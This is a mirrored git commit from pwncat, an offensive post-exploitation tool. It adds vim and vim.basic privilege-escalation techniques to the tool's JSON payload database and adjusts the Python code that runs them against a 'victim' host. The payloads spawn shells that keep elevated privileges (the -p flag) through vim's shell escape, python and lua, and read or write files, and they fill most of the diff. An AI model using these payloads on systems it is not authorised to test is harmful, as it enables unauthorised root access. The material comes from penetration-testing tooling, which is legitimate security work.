mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-30 12:24:14 +01:00
Got vim seemingly working as a GTFObin...
This commit is contained in:
parent
3801b50f14
commit
2eb9487e64
@ -879,19 +879,19 @@
|
|||||||
{
|
{
|
||||||
"type": "shell",
|
"type": "shell",
|
||||||
"payload": "{command}",
|
"payload": "{command}",
|
||||||
"args": ["-c", "':!{shell}'", "-c", "'quit'"],
|
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
|
||||||
// Include an extra newline to be sure to exit vim itself.
|
// Include an extra newline to be sure to exit vim itself.
|
||||||
"exit": "exit\n\n"
|
"exit": "exit\n\n"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "shell",
|
"type": "shell",
|
||||||
"payload": "{command}",
|
"payload": "{command}",
|
||||||
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
|
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "shell",
|
"type": "shell",
|
||||||
"payload": "{command}",
|
"payload": "{command}",
|
||||||
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
|
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "shell",
|
"type": "shell",
|
||||||
@ -907,10 +907,47 @@
|
|||||||
{
|
{
|
||||||
"type": "write",
|
"type": "write",
|
||||||
"stream": "print",
|
"stream": "print",
|
||||||
"payload": "{command} >/dev/null",
|
"payload": "{cat} - | {command}",
|
||||||
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"]
|
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"vim.basic": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
|
||||||
|
// Include an extra newline to be sure to exit vim itself.
|
||||||
|
"exit": "exit\n\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{cat} - | {command}",
|
||||||
|
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
}
|
}
|
||||||
// Vim can PROBABLY file write... but I have not figured that out just yet.
|
|
||||||
],
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
"wish": [
|
"wish": [
|
||||||
|
@ -9,10 +9,6 @@ from sqlalchemy.exc import InvalidRequestError
|
|||||||
import warnings
|
import warnings
|
||||||
from sqlalchemy import exc as sa_exc
|
from sqlalchemy import exc as sa_exc
|
||||||
|
|
||||||
# Ignore SQL Alchemy warnings
|
|
||||||
with warnings.catch_warnings():
|
|
||||||
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
|
|
||||||
|
|
||||||
import pwncat
|
import pwncat
|
||||||
from pwncat import util
|
from pwncat import util
|
||||||
from pwncat.remote import Victim
|
from pwncat.remote import Victim
|
||||||
@ -80,5 +76,11 @@ def main():
|
|||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
|
||||||
|
# Ignore SQL Alchemy warnings
|
||||||
|
with warnings.catch_warnings():
|
||||||
|
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
|
||||||
|
|
||||||
main()
|
main()
|
||||||
|
|
||||||
sys.exit(0)
|
sys.exit(0)
|
||||||
|
@ -238,7 +238,7 @@ class CommandParser:
|
|||||||
# We have a connection! Go back to raw mode
|
# We have a connection! Go back to raw mode
|
||||||
pwncat.victim.state = State.RAW
|
pwncat.victim.state = State.RAW
|
||||||
self.running = False
|
self.running = False
|
||||||
except Exception as exc:
|
except (Exception, KeyboardInterrupt) as exc:
|
||||||
traceback.print_exc()
|
traceback.print_exc()
|
||||||
continue
|
continue
|
||||||
|
|
||||||
@ -299,7 +299,7 @@ class CommandParser:
|
|||||||
command.parser.prog = prog_name
|
command.parser.prog = prog_name
|
||||||
|
|
||||||
except SystemExit:
|
except SystemExit:
|
||||||
# The arguments were icncorrect
|
# The arguments were incorrect
|
||||||
return
|
return
|
||||||
|
|
||||||
|
|
||||||
|
@ -265,7 +265,7 @@ class MethodWrapper:
|
|||||||
return self.method.build_payload(self.binary_path, **kwargs)
|
return self.method.build_payload(self.binary_path, **kwargs)
|
||||||
|
|
||||||
def exit(self, **kwargs) -> str:
|
def exit(self, **kwargs) -> str:
|
||||||
return self.method.binary.gtfo.resolve_binaries(
|
original = self.method.binary.gtfo.resolve_binaries(
|
||||||
self.method.exit,
|
self.method.exit,
|
||||||
ctrl_c=ControlCodes.CTRL_C,
|
ctrl_c=ControlCodes.CTRL_C,
|
||||||
ctrl_z=ControlCodes.CTRL_Z,
|
ctrl_z=ControlCodes.CTRL_Z,
|
||||||
@ -275,6 +275,11 @@ class MethodWrapper:
|
|||||||
**kwargs,
|
**kwargs,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
if original == "" and Capability.SHELL in self.cap:
|
||||||
|
original = "exit\n"
|
||||||
|
|
||||||
|
return original
|
||||||
|
|
||||||
def input(self, **kwargs) -> str:
|
def input(self, **kwargs) -> str:
|
||||||
return self.method.binary.gtfo.resolve_binaries(
|
return self.method.binary.gtfo.resolve_binaries(
|
||||||
self.method.input,
|
self.method.input,
|
||||||
|
@ -277,12 +277,14 @@ class Finder:
|
|||||||
for technique in techniques:
|
for technique in techniques:
|
||||||
if Capability.SHELL in technique.capabilities:
|
if Capability.SHELL in technique.capabilities:
|
||||||
try:
|
try:
|
||||||
|
|
||||||
# Attempt our basic, known technique
|
# Attempt our basic, known technique
|
||||||
|
shlvl = pwncat.victim.getenv("SHLVL")
|
||||||
exit_script = technique.method.execute(technique)
|
exit_script = technique.method.execute(technique)
|
||||||
pwncat.victim.flush_output(some=True)
|
pwncat.victim.flush_output(some=True)
|
||||||
|
|
||||||
# Reset the terminal to ensure we are stable
|
# Reset the terminal to ensure we are stable
|
||||||
time.sleep(0.1)
|
time.sleep(0.1) # This seems inevitable for some privescs...
|
||||||
pwncat.victim.reset()
|
pwncat.victim.reset()
|
||||||
|
|
||||||
# Check that we actually succeeded
|
# Check that we actually succeeded
|
||||||
@ -300,7 +302,9 @@ class Finder:
|
|||||||
|
|
||||||
# Get out of this subshell. We don't need it
|
# Get out of this subshell. We don't need it
|
||||||
# pwncat.victim.process(exit_script, delim=False)
|
# pwncat.victim.process(exit_script, delim=False)
|
||||||
|
|
||||||
pwncat.victim.run(exit_script, wait=False)
|
pwncat.victim.run(exit_script, wait=False)
|
||||||
|
time.sleep(0.1) # Still inevitable for some privescs...
|
||||||
pwncat.victim.recvuntil("\n")
|
pwncat.victim.recvuntil("\n")
|
||||||
|
|
||||||
# Clean up whatever mess was left over
|
# Clean up whatever mess was left over
|
||||||
@ -312,6 +316,8 @@ class Finder:
|
|||||||
# Continue on as if it hadn't worked.
|
# Continue on as if it hadn't worked.
|
||||||
except PrivescError:
|
except PrivescError:
|
||||||
pass
|
pass
|
||||||
|
except ValueError:
|
||||||
|
raise PrivescError
|
||||||
if Capability.READ in technique.capabilities:
|
if Capability.READ in technique.capabilities:
|
||||||
readers.append(technique)
|
readers.append(technique)
|
||||||
if Capability.WRITE in technique.capabilities:
|
if Capability.WRITE in technique.capabilities:
|
||||||
|
Loading…
Reference in New Issue
Block a user